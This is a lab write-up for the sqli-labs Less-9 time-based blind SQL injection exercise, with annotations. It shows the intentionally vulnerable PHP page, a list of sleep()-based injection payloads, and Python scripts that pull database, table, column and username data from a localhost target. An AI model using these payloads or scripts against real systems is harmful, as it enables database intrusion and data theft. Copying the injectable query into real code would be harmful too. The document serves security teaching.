<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-9 Blind- Time based- Single Quotes- String</title>
</head>
<!-- sqli-labs Less-9 page shell, reproduced as shipped: legacy XHTML 1.0 Transitional with
     presentational bgcolor/font attributes (deprecated in HTML5). The markup is irrelevant to
     the lesson; the interesting part is the PHP block inside the <font> element below. -->
<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
// sqli-labs Less-9: time-based blind SQL injection target, single-quoted string context.
// Review notes (why this lesson is "time based"):
//  - $_GET['id'] is concatenated straight into the SELECT below without validation; that is the sink.
//  - error_reporting(0) suppresses MySQL error output, so error-based techniques get no feedback.
//  - Both branches of the if/else print the identical "You are in..........." text, so the
//    visible response is not a boolean oracle. The only per-request signal left is timing
//    (and, as the else branch emits one extra <font> tag, a slightly different Content-Length).
//  - Mitigation would be casting $id to int or using a prepared statement; the code is left
//    unchanged here because the vulnerability is the exercise.
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
// NOTE(review): the raw, unvalidated id is appended to result.txt in the script's own (web-served)
// directory. It records every payload the page receives — a useful detection artifact for the
// lab — but its content is attacker-controlled and must never be trusted or rendered as HTML.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
// Injection sink: $id is interpolated inside single quotes with no escaping or parameterization.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);   // mysql_* extension: removed in PHP 7, so this only runs on PHP 5
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
// Same visible message as the success branch: no boolean difference for the caller.
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<!-- Lesson banner image. The </br> sequence above is malformed (closing tag for a void element)
     and <center> is deprecated; kept as shipped since the markup is not part of the exercise. -->
<img src="../images/Less-9.jpg" /></center>
</body>
</html>
从源码可以看出,无论我们的SQL注入在后端拼接的语句是否正确,都只会给我们返回You are in.......这样的句子,所以不太符合布尔盲注的特征,即有两个不一样的返回界面。
不过有时候它的界面虽然是一样的,它的Content-Length却是不一样的,可以通过这一点来进行布尔盲注。
#先判断是什么类型的注入
id=1 and sleep(5)--+
id=1' and sleep(5)--+
#看页面的返回速度。可以知道是单引号注入。
#爆破数据库名长度
?id=1'and if(length(database())=8,sleep(5),1)--+
#爆破数据库名
?id=1' and if(ascii(substr(database(),{},1))={},sleep(5),1)--+
#爆破表个数
?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)--+
#爆破表名长度:
?id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6,sleep(5),1)--+
#爆破表名:
?id=1' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+
#爆破列数
?id=1' and if( (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())=3,sleep(5),1)--+
#爆破列名长度:
?id=1' and if( length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1))=2,sleep(5),1)--+
#爆破列名
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))=101,sleep(5),1)--+
#爆破数据条数
?id=1' and if((select count(username) from users)=13,sleep(5),1)--+
#爆破数据内容长度:
?id=1' and if(length(substr((select username from users limit 0,1),1))=4,sleep(5),1)--+
#爆破数据内容
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=101,sleep(5),1)--+
爆破数据库
import requests
import time
# Time-based blind walkthrough against the local sqli-labs Less-9 target (localhost only).
# Oracle: the server sleeps 5 s when the injected condition is true, and a request taking
# >= 3 s is read as "true". The fixed 3 s threshold is the weak point: any slow response
# (server load, network hiccup) is counted as a hit, which is the usual cause of wrong characters.
# From the defender's side this traffic is very recognisable: dozens of near-identical GETs
# differing only in one compared number, each taking ~5 s when the guess is right.
url="http://localhost/sqli-labs-master/Less-9/?id=1"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
# NOTE(review): this Session is created but immediately shadowed by the requests.get() results
# below, so no connection reuse actually happens.
response=requests.session()
# Falls back to 1 if no length in 1..39 triggers the delay.
database_length=1
# Step 1: database-name length, probing 1..39.
for i in range(1,40):
    payload_length="'and if(length(database())={},sleep(5),1)--+".format(i)
    start_time=time.time()
    response=requests.get(url+payload_length,headers=headers)
    if time.time()-start_time>=3:
        database_length=i
        print("数据库名长度:{}".format(i))
        break
    else :
        pass
# Step 2: one character per position, testing ASCII codes 1..127 until the delay fires.
database_name=""
for i in range(1,database_length+1):
    for j in range(1,128):
        payload="' and if(ascii(substr(database(),{},1))={},sleep(5),1)--+".format(i,j)
        start_time=time.time()
        response=requests.get(url+payload,headers=headers)
        if time.time()-start_time>=3:
            database_name=database_name+chr(j)
            break
print("数据库名:",database_name)
爆破表的数量:
import requests
import time
# Count the tables in the current database (local sqli-labs Less-9 only).
# Same timing oracle as the other scripts: a >= 3 s response is taken as "condition true".
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
# Probe counts 1..39; prints the first count that triggers the delay, nothing if none does.
for i in range(1,40):
    payload="?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())={},sleep(5),1)--+".format(i)
    start_time=time.time()
    response=requests.get(url=url+payload,headers=headers)
    if time.time()-start_time>=3:
        print(i)
        break
爆破表名:
import requests
import time
# Recover table names one at a time (local sqli-labs Less-9 only).
# table_number is hard-coded from the previous step's output rather than discovered here.
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
# NOTE(review): Session created but shadowed by the requests.get() results below.
response=requests.session()
table_number=4
for i in range(0,table_number):
    table_name=""
    # Falls back to 1 if no length in 1..39 triggers the delay.
    tablelen=1
    # Length of the i-th table name (LIMIT i,1).
    for j in range(1,40):
        payloadlen="?id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),1))={},sleep(5),1)--+".format(i,j)
        start_time=time.time()
        response=requests.get(url+payloadlen,headers=headers)
        if time.time()-start_time>=3:
            tablelen=j
            print(tablelen)
            break
    # NOTE(review): this range starts at position 0, unlike the other scripts which start at 1;
    # MySQL substr() with position 0 yields '', so the m=0 pass issues 127 requests that can
    # never match. Harmless for the result, but slow — probably meant to be range(1,tablelen+1).
    for m in range(0,tablelen+1):
        for n in range(1,128):
            payload="?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={},sleep(5),1)--+".format(i,m,n)
            start_time=time.time()
            response=requests.get(url+payload,headers=headers)
            if time.time()-start_time>=3:
                table_name=table_name+chr(n)
                break
    print(table_name)
爆破列数:
import requests
import time
# Count the columns of the users table (local sqli-labs Less-9 only); the table name is
# hard-coded from the previous step.
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
# NOTE(review): Session created but shadowed by the requests.get() result below.
response=requests.session()
# Probe counts 1..39; prints the first that triggers the delay, nothing if none does.
for i in range(1,40):
    payload="?id=1' and if( (select count(column_name) from information_schema.columns where table_name='users'and table_schema=database())={},sleep(5),1)--+".format(i)
    start_time=time.time()
    response=requests.get(url+payload,headers=headers)
    if time.time()-start_time>=3:
        print(i)
        break
爆破列名:
import requests
import time
# Recover the column names of the users table (local sqli-labs Less-9 only).
# column_number is hard-coded from the previous step's output.
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
# NOTE(review): Session created but shadowed by the requests.get() results below.
response=requests.session()
column_number=3
for i in range(0,column_number):
    column_name=""
    # Length of the i-th column name (LIMIT i,1).
    # NOTE(review): columnn_len is only assigned inside the if; if no length in 1..39
    # triggers the delay on the first column, the loop below raises NameError.
    for j in range(1,40):
        payload_length="?id=1' and if( length(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),1))={},sleep(5),1)--+".format(i,j)
        start_time=time.time()
        response=requests.get(url+payload_length,headers=headers)
        if time.time()-start_time>=3:
            columnn_len=j
            break
    # One character per position, ASCII 1..127.
    for m in range(1,columnn_len+1):
        for n in range(1,128):
            payload="?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit {},1),{},1))={},sleep(5),1)--+".format(i,m,n)
            start_time=time.time()
            response=requests.get(url+payload,headers=headers)
            if time.time()-start_time>=3:
                column_name+=chr(n)
                break
    print(column_name)
爆破数据条数:
import requests
import time
# Count the rows in users (local sqli-labs Less-9 only).
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
# NOTE(review): Session created but shadowed by the requests.get() result below.
response=requests.session()
# Probe counts 1..498; prints the first that triggers the delay, nothing if none does.
# Worst case this is ~500 requests at ~5 s each — sequential linear search is the
# limiting factor of every script on this page.
for i in range(1,499):
    payload_number="?id=1' and if((select count(username) from users)={},sleep(5),1)--+".format(i)
    start_time=time.time()
    response=requests.get(url+payload_number,headers=headers)
    if time.time()-start_time>=3:
        print(i)
        break
爆破数据:
import requests
import time
# Recover the username column row by row (local sqli-labs Less-9 only).
# Number is hard-coded from the previous step's output.
url="http://localhost/sqli-labs-master/Less-9/"
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0"
}
# NOTE(review): Session created but shadowed by the requests.get() results below.
response=requests.session()
Number=13
for i in range(0,Number):
    name=""
    # Length of the i-th username (LIMIT i,1), probing 1..89.
    # NOTE(review): `length` shadows the builtin and is only assigned inside the if; if no
    # length triggers the delay on the first row, the loop below raises NameError.
    for j in range(1,90):
        payload_len="?id=1' and if(length(substr((select username from users limit {},1),1))={},sleep(5),1)--+".format(i,j)
        start_time=time.time()
        response=requests.get(url+payload_len,headers=headers)
        if time.time()-start_time>=3:
            length=j
            print(length)
            break
    # One character per position, ASCII 1..127.
    for m in range(1,length+1):
        for n in range(1,128):
            payload="?id=1' and if(ascii(substr((select username from users limit {},1),{},1))={},sleep(5),1)--+".format(i,m,n)
            start_time=time.time()
            # NOTE(review): `headers==headers` is a comparison, not a keyword argument — the
            # boolean True is passed positionally (as params) and the User-Agent header is not
            # sent here. Every other script on the page uses headers=headers; verify intent.
            response=requests.get(url+payload,headers==headers)
            if time.time()-start_time>=3:
                name+=chr(n)
                break
    print("第{}条数据".format(i+1),name)